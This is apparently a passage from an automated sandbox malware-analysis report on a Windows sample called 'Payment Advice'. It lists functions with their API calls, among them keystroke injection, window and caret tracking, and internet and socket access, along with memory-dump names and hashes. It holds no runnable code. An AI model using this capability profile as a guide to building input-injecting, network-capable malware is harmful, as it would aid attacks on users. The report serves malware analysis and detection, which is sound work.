GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 005E3BFB

Strings

RegDeleteKeyExW, xrefs: 005E3BF5
advapi32.dll, xrefs: 005E3BE4

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: 5226aa60a879c70db703e3126097f3b0e224a7077abd73ca878a806966b44118
Instruction ID: a5ea570894c5f3d9b592d62024e8a6be371017677813353baf59e475d38ff890
Opcode Fuzzy Hash: 5226aa60a879c70db703e3126097f3b0e224a7077abd73ca878a806966b44118
Instruction Fuzzy Hash: 77D0C7B05407529FD7245FA5E80D643FEF5BF06715F215599E499E3150DEB0DC808E90

Function 005B9B30 Relevance: 6.3, APIs: 4, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a6a78899aa9c6ee79dee1ace706715bda75ea1c2128af0dbbc72e86b939f241
Instruction ID: c90cd4411eabd0dfef3b2439ca1bf2adfc0e50bc0170d95a5859fac16ad6f358
Opcode Fuzzy Hash: 2a6a78899aa9c6ee79dee1ace706715bda75ea1c2128af0dbbc72e86b939f241
Instruction Fuzzy Hash: FBC12D75A0021AEFDB14DF94C894AEEBBB9FF48714F108598EA05EB251D730EE41DB90

Function 005DAA84 Relevance: 6.3, APIs: 4, Instructions: 268COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 005DAAB4
CoUninitialize.OLE32 ref: 005DAABF

Part of subcall function 005C0213: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 005C027B

VariantInit.OLEAUT32(?), ref: 005DAACA
VariantClear.OLEAUT32(?), ref: 005DAD9D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 9223baa46bafa40ccfd394b050d867a035dfb40e98ac04c0ceb42ce162a67c33
Instruction ID: 5fad1625fc08f3172b80c6881826a5705cb78dfe4050f8c21387d32dae0d22d1
Opcode Fuzzy Hash: 9223baa46bafa40ccfd394b050d867a035dfb40e98ac04c0ceb42ce162a67c33
Instruction Fuzzy Hash: ADA14E352047029FDB11EF58C885B1EBBE5BF88710F14484AF996AB3A1CB30ED45CB86

Function 005B91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005B91DD
SysAllocString.OLEAUT32(?), ref: 005B9286
VariantCopy.OLEAUT32 ref: 005B92B5
VariantClear.OLEAUT32(?), ref: 005B92DC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 90929f7f0ebf46ae32bc9cd74bf5b38877b9b61ce48c9c306a033c84668b005e
Instruction ID: 83ac279df6e570e91a396f0a24b18c90af22c0aa5161d77d2b6561bf4ddc8e01
Opcode Fuzzy Hash: 90929f7f0ebf46ae32bc9cd74bf5b38877b9b61ce48c9c306a033c84668b005e
Instruction Fuzzy Hash: 7E519134A047069BDB24AF69D495BAEBFE5FF85310F208C1FE646DB2D1DB30A8808715

Function 005B1CBA Relevance: 6.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

APIs

_cvtdate.LIBCMT ref: 005B1D53
_cvtdate.LIBCMT ref: 005B1DBA
_cvtdate.LIBCMT ref: 005B1DF4
_cvtdate.LIBCMT ref: 005B1E0A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _cvtdate
String ID:
API String ID: 159983822-0
Opcode ID: f31d01aa6b1753002eab2cb9c68915f8c7b9a95d097b46b7c632a6e4e3a3989d
Instruction ID: 9dd1efa0c25fb0620128355f2b4e34fb68d24408aa304a4db9a3c75c342b45fd
Opcode Fuzzy Hash: f31d01aa6b1753002eab2cb9c68915f8c7b9a95d097b46b7c632a6e4e3a3989d
Instruction Fuzzy Hash: A051B2A6640A21BDF7648B45ACA5F773AAFF399B00F60541AFB81C54D2E274ACC0D734

Function 005EC4D7 Relevance: 6.1, APIs: 4, Instructions: 137COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(0178B128,?), ref: 005EC544
ScreenToClient.USER32(?,00000002), ref: 005EC574
MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 005EC5DA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 569ab1b73d03a901ab1b57c0cd771f78369c9247e93cd5ae7f9ed913a5489f8f
Instruction ID: 690c9b2b9112f029c52c52bd6a27ceb2cd44c9b9acf058c8f0dbccc39954dc40
Opcode Fuzzy Hash: 569ab1b73d03a901ab1b57c0cd771f78369c9247e93cd5ae7f9ed913a5489f8f
Instruction Fuzzy Hash: C5514F75900245EFCF14DF69C880AAE7FB6FB55320F10865AF9A59B290D730ED82CB90

Function 005BC410 Relevance: 6.1, APIs: 4, Instructions: 130windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 005BC462
__itow.LIBCMT ref: 005BC49C

Part of subcall function 005BC6E8: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 005BC753

SendMessageW.USER32(?,0000110A,00000001,?), ref: 005BC505
__itow.LIBCMT ref: 005BC55A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: f5a888ae89cece36ea93dd4af331352141c0167e19fef6922e4af3f260f53289
Instruction ID: b40fa373e8c7c85d011c90c43c885e19e63870daafa68e0578ea911e72d62599
Opcode Fuzzy Hash: f5a888ae89cece36ea93dd4af331352141c0167e19fef6922e4af3f260f53289
Instruction Fuzzy Hash: 2E419571A0060AABDF21EF54C85ABEE7FB9BF89700F000059F945B7181DB70AA45CBA5

Function 005C390C Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,00000000,?,00000001), ref: 005C3966
SetKeyboardState.USER32(00000080,?,00000001), ref: 005C3982
PostMessageW.USER32(00000000,00000102,?,00000001), ref: 005C39EF
SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 005C3A4D

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 7ca1f60fe66511a64e73227854d658d7231d64940c86c304863e5912b5f9266d
Instruction ID: 1351e6f2b3989215b7fdcf1491fd3767c1dfbb7056cfc6a6be4ac1c8798f975b
Opcode Fuzzy Hash: 7ca1f60fe66511a64e73227854d658d7231d64940c86c304863e5912b5f9266d
Instruction Fuzzy Hash: E541D370A4424CAEEF218FE48809FFDBFB9BB59310F04815EE4C1A62D1C7B48A95D765

Function 005CE698 Relevance: 6.1, APIs: 4, Instructions: 110fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 005CE742
GetLastError.KERNEL32(?,00000000), ref: 005CE768
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 005CE78D
CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 005CE7B9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateHardLink$DeleteErrorFileLast
String ID:
API String ID: 3321077145-0
Opcode ID: c7d83b99e9e7c1d358c514cd9ca7ad5c7be732a66797553ed6e4d82d0e48484d
Instruction ID: 43008116991879bb423f5cbeb8052b2a04f3bac328e00295dde28ff19ef75649
Opcode Fuzzy Hash: c7d83b99e9e7c1d358c514cd9ca7ad5c7be732a66797553ed6e4d82d0e48484d
Instruction Fuzzy Hash: 604122392006519FCF11AF54C849A5DBBE6BF99720B098498ED06AB3A2CB74FD40DB91

Function 005EB544 Relevance: 6.1, APIs: 4, Instructions: 108COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 005EB5D1

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 97e0cb0a6fd2ba18b3774d71bde0e96a9cb313b1b9b1e682df96a341d705820e
Instruction ID: 85d342056ce90d65cf5c2318e150ffadc82681ca740107de9533f7d61eee68e3
Opcode Fuzzy Hash: 97e0cb0a6fd2ba18b3774d71bde0e96a9cb313b1b9b1e682df96a341d705820e
Instruction Fuzzy Hash: 6131CD74641294ABFF289F5ACC89FAA7F65FB06312F504902FAD1E61E1DB30A9408B51

Function 005ED7DE Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 005ED807
GetWindowRect.USER32(?,?), ref: 005ED87D
PtInRect.USER32(?,?,005EED5A), ref: 005ED88D
MessageBeep.USER32(00000000), ref: 005ED8FE

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 6e2476672d26ac2b90b41e9bb580071461e51801301a489e678817d3dffaa97c
Instruction ID: bb890a67d08251f8f6cf39f958ae72d15352b6fdee5269196b83d181c420b4f7
Opcode Fuzzy Hash: 6e2476672d26ac2b90b41e9bb580071461e51801301a489e678817d3dffaa97c
Instruction Fuzzy Hash: 3341CE74A04299DFCB19CF5AC884B69BBF6FB46310F1981A9E494CF251C330E841CB60

Function 005C3A61 Relevance: 6.1, APIs: 4, Instructions: 104keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 005C3AB8
SetKeyboardState.USER32(00000080,?,00008000), ref: 005C3AD4
PostMessageW.USER32(00000000,00000101,00000000,?), ref: 005C3B34
SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 005C3B92

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 07d2a3260c6e7867de62173a9384295595da38f3d2d0d00d8dd2ff0dc786fb8d
Instruction ID: 3c492034910ba367bc757f240aa3ed13b1366910f2aafee59e0e363273bd9bc7
Opcode Fuzzy Hash: 07d2a3260c6e7867de62173a9384295595da38f3d2d0d00d8dd2ff0dc786fb8d
Instruction Fuzzy Hash: 3531247094025CAEEB219BE48819FBE7FBABB55318F04425EE481A31D1CB758E45C761

Function 005B4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 005B4038
__isleadbyte_l.LIBCMT ref: 005B4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005B4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 005B40CA

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: fbfdb8c032a63647736959a2ab2a587490558e96da79c1b49cdd4dbc5ee4575b
Instruction ID: f8b97a142846ecbfddfd3e4813e838b29e071a44d151ecb72de71fb8aa60c42d
Opcode Fuzzy Hash: fbfdb8c032a63647736959a2ab2a587490558e96da79c1b49cdd4dbc5ee4575b
Instruction Fuzzy Hash: 0E31A33150025AEFDB31AF64C849BBA7FA5BF41310F158518E6558B192D731F891DF90

Function 005E7CA5 Relevance: 6.1, APIs: 4, Instructions: 93COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 005E7CB9

Part of subcall function 005C5F55: GetWindowThreadProcessId.USER32(?,00000000), ref: 005C5F6F
Part of subcall function 005C5F55: GetCurrentThreadId.KERNEL32 ref: 005C5F76
Part of subcall function 005C5F55: AttachThreadInput.USER32(00000000,?,005C781F), ref: 005C5F7D

GetCaretPos.USER32(?), ref: 005E7CCA
ClientToScreen.USER32(00000000,?), ref: 005E7D03
GetForegroundWindow.USER32 ref: 005E7D09

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 971c64b3460080f5a3efa65ba7cc6b55c2683fc009da710f7e0ead43b0dd5c93
Instruction ID: d4b2f140d2615700d79a8e4f873a56b71a14aa34e85ad4866d4d8cde322db180
Opcode Fuzzy Hash: 971c64b3460080f5a3efa65ba7cc6b55c2683fc009da710f7e0ead43b0dd5c93
Instruction Fuzzy Hash: 0831F071900109AFDB11EFA9D8859EFBBF9FF98314F10846AE815E7211D6319E45CFA0

Function 005EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0059B34E: GetWindowLongW.USER32(?,000000EB), ref: 0059B35F

GetCursorPos.USER32(?), ref: 005EF211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,005FE4C0,?,?,?,?,?), ref: 005EF226
GetCursorPos.USER32(?), ref: 005EF270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,005FE4C0,?,?,?), ref: 005EF2A6

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: badd23b3193b9fa9f1fa56d9ff068cf3760c64dcd8bababa8b4dc1b5081f1d03
Instruction ID: e1b764940f7332d11055006b88cb455c4d1aa7b7d93d562ce6c9cae138f63e75
Opcode Fuzzy Hash: badd23b3193b9fa9f1fa56d9ff068cf3760c64dcd8bababa8b4dc1b5081f1d03
Instruction Fuzzy Hash: 2B219E3D600018AFDB1A8F95DC58EEE7FB6FB4A310F444069FA454B2A1D7309950DB60

Function 005D431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 005D4358

Part of subcall function 005D43E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 005D4401
Part of subcall function 005D43E2: InternetCloseHandle.WININET(00000000), ref: 005D449E

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 8a351e01978e537cd51a8cee18592de3bfb714be76459148640c6e3308c1ce3a
Instruction ID: c9012a57fa5a5b767808bd77d714663021341b5be2c999d195e8796612ada9ca
Opcode Fuzzy Hash: 8a351e01978e537cd51a8cee18592de3bfb714be76459148640c6e3308c1ce3a
Instruction Fuzzy Hash: 0921D131240601BBEB219FAC9C04FBBBBAAFF84710F14491BFA1596750DB7198619BA0

Function 005D8A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 005D8AE0
__WSAFDIsSet.WSOCK32(00000000,00000001), ref: 005D8AF2
accept.WSOCK32(00000000,00000000,00000000), ref: 005D8AFF
WSAGetLastError.WSOCK32(00000000), ref: 005D8B16

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorLastacceptselect
String ID:
API String ID: 385091864-0
Opcode ID: 1fb4ab2ea10da15cebeb84b8f50e31195f761c7ef7c7089acb2b3b6cadb9ba20
Instruction ID: 42c1259759d0ff44f172542a40f74d431132c95ed16fae5c7baa6c0304fee257
Opcode Fuzzy Hash: 1fb4ab2ea10da15cebeb84b8f50e31195f761c7ef7c7089acb2b3b6cadb9ba20
Instruction Fuzzy Hash: F8215472A01124AFD7219F69C885A9E7FFDEF49350F00416AF849D7291DB74D9418F90

Function 005E8A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 005E8AA6
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E8AC0
SetWindowLongW.USER32(?,000000EC,00000000), ref: 005E8ACE
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 005E8ADC

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 2de472a79a13aa910e133e4c0ad0c2cda07185740a7d770d21184a591f638a12
Instruction ID: 195bbf9a02d1c4a426e61a06fe2e699f1c830429b1cb6d9e68a3b88176fd4e1a
Opcode Fuzzy Hash: 2de472a79a13aa910e133e4c0ad0c2cda07185740a7d770d21184a591f638a12
Instruction Fuzzy Hash: 03119331245111AFD708AB59CC09FBA7BD9FF85320F184119F96AD72E2CB70AC008794

Function 005C0AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON

Download Yara Rule

APIs

Part of subcall function 005C1E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,005C0ABB,?,?,?,005C187A,00000000,000000EF,00000119,?,?), ref: 005C1E77
Part of subcall function 005C1E68: lstrcpyW.KERNEL32(00000000,?), ref: 005C1E9D
Part of subcall function 005C1E68: lstrcmpiW.KERNEL32(00000000,?,005C0ABB,?,?,?,005C187A,00000000,000000EF,00000119,?,?), ref: 005C1ECE

